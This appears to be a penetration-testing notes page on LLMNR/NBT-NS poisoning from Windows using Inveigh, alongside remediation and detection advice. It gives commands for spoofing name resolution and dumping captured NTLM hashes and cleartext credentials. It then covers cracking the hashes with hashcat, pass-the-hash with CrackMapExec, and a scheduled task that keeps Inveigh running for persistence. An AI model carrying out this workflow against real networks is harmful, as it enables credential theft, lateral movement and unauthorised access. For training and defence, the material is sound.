llmnr-nbt-ns-poisoning-from-windows

1. Inveigh Overview:

Purpose: A Windows-based tool for LLMNR/NBT-NS poisoning, similar to Responder.
Languages: Written in PowerShell and C#.
Protocols: Supports LLMNR, DNS, mDNS, NBNS, DHCPv6, ICMPv6, HTTP, HTTPS, SMB, LDAP, WebDAV, and Proxy Auth.
Availability: Found in the C:\Tools directory on the provided Windows attack host.
Versions:
- PowerShell (original, no longer updated)
- C# (InveighZero, maintained by the author)

2. Using Inveigh (PowerShell):

Importing the Module:

Import-Module .\Inveigh.ps1

Listing Parameters:

(Get-Command Invoke-Inveigh).Parameters

Running Inveigh:

Invoke-Inveigh -NBNS Y -ConsoleOutput Y -FileOutput Y

Enables NBNS spoofing, console output, and file output.
Displays enabled/disabled options, captured LLMNR and mDNS requests, SMB negotiation, and NTLM challenges.
Saves output to the C:\Tools directory.

Stopping Inveigh (PowerShell):

Stop-Inveigh

3. Using Inveigh (C# - InveighZero):

Execution:

.\Inveigh.exe

Output:

Displays enabled/disabled options.
Indicates successful and failed listeners.
Captures LLMNR requests.

Interactive Console:

Press ESC to enter the interactive console.
Use the HELP command for a list of available console commands.

Common Commands:

GET NTLMV2UNIQUE - Displays unique captured NTLMv2 hashes.
GET NTLMV2USERNAMES - Displays captured usernames.

4. Inveigh Console Commands:

GET CONSOLE
GET DHCPv6Leases
GET LOG
GET NTLMV1
GET NTLMV2
GET NTLMV1UNIQUE
GET NTLMV2UNIQUE
GET NTLMV1USERNAMES
GET NTLMV2USERNAMES
GET CLEARTEXT
GET CLEARTEXTUNIQUE
GET REPLYTODOMAINS
GET REPLYTOHOSTS
GET REPLYTOIPS
GET REPLYTOMACS
GET IGNOREDOMAINS
GET IGNOREHOSTS
GET IGNOREIPS
GET IGNOREMACS
SET CONSOLE
HISTORY
RESUME
STOP

5. Remediation:

Disable LLMNR:

Group Policy:
- Computer Configuration -> Administrative Templates -> Network -> DNS Client -> "Turn OFF Multicast Name Resolution."

Disable NBT-NS:

Navigate to:
- Network and Sharing Center -> Change adapter settings -> Adapter properties -> Internet Protocol Version 4 (TCP/IPv4) -> Advanced -> WINS -> Disable NetBIOS over TCP/IP.

PowerShell GPO Startup Script:

$regkey = "HKLM:SYSTEM\CurrentControlSet\services\NetBT\Parameters\Interfaces"
Get-ChildItem $regkey |foreach { Set-ItemProperty -Path "$regkey\$($_.pschildname)" -Name NetbiosOptions -Value 2 -Verbose}

Deploy using Group Policy Management.

Other Mitigations:

Filtering network traffic.
Enabling SMB Signing.
Using network intrusion detection and prevention systems.
Implementing network segmentation.

6. Detection:

Honeypotting: Inject LLMNR/NBT-NS requests for non-existent hosts.
Traffic Monitoring: Monitor ports UDP 5355 and 137.
Event Log Monitoring: Focus on Event IDs 4697 and 7045.
Registry Monitoring:
- HKLM\Software\Policies\Microsoft\Windows NT\DNSClient\EnableMulticast (0 = disabled)
Sysmon: Monitor for suspicious process creations or network connections.

7. Post-Capture Actions:

Enumeration:

Use BloodHound for analyzing captured hashes.

Hash Cracking with Hashcat:

hashcat -m 5600 captured_hashes.txt rockyou.txt --force

Identify Hash Types:

hashid captured_hash.txt

Using CrackMapExec for Exploitation:

crackmapexec smb <target-ip> -u <username> -H <hash>

Password Spraying:

Employ password spraying techniques if hash cracking is unsuccessful.

8. Automation Example (Scheduled Task for Persistence):

$Action = New-ScheduledTaskAction -Execute 'powershell.exe' -Argument '-File "C:\Tools\Inveigh.ps1"'
$Trigger = New-ScheduledTaskTrigger -AtStartup
Register-ScheduledTask -Action $Action -Trigger $Trigger -TaskName "InveighPersistence" -Description "Auto-start Inveigh for LLMNR/NBT-NS Poisoning"

9. Real-World Workflow Example:

Launch Inveigh to capture hashes.
Use Hashcat to crack captured NTLMv2 hashes.
Attempt lateral movement using cracked credentials with CrackMapExec.
Continue enumeration or privilege escalation as needed.

10. Defensive Recommendation Summary:

Disable LLMNR and NBT-NS protocols.
Enforce SMB signing.
Monitor network traffic for suspicious poisoning attempts.
Implement strict network segmentation and authentication controls.

Previousllmnr-nbt-ns-poisoning-from-linux NextPassword Spraying Commands and Techniques

Last updated 1 day ago

hashtag1. Inveigh Overview:

hashtag2. Using Inveigh (PowerShell):

hashtagImporting the Module:

hashtagListing Parameters:

hashtagRunning Inveigh:

hashtagStopping Inveigh (PowerShell):

hashtag3. Using Inveigh (C# - InveighZero):

hashtagExecution:

hashtagOutput:

hashtagInteractive Console:

hashtagCommon Commands:

hashtag4. Inveigh Console Commands:

hashtag5. Remediation:

hashtagDisable LLMNR:

hashtagDisable NBT-NS:

hashtagPowerShell GPO Startup Script:

hashtagOther Mitigations:

hashtag6. Detection:

hashtag7. Post-Capture Actions:

hashtagEnumeration:

hashtagHash Cracking with Hashcat:

hashtagIdentify Hash Types:

hashtagUsing CrackMapExec for Exploitation:

hashtagPassword Spraying:

hashtag8. Automation Example (Scheduled Task for Persistence):

hashtag9. Real-World Workflow Example:

hashtag10. Defensive Recommendation Summary:

1. Inveigh Overview:

2. Using Inveigh (PowerShell):

Importing the Module:

Listing Parameters:

Running Inveigh:

Stopping Inveigh (PowerShell):

3. Using Inveigh (C# - InveighZero):

Execution:

Output:

Interactive Console:

Common Commands:

4. Inveigh Console Commands:

5. Remediation:

Disable LLMNR:

Disable NBT-NS:

PowerShell GPO Startup Script:

Other Mitigations:

6. Detection:

7. Post-Capture Actions:

Enumeration:

Hash Cracking with Hashcat:

Identify Hash Types:

Using CrackMapExec for Exploitation:

Password Spraying:

8. Automation Example (Scheduled Task for Persistence):

9. Real-World Workflow Example:

10. Defensive Recommendation Summary: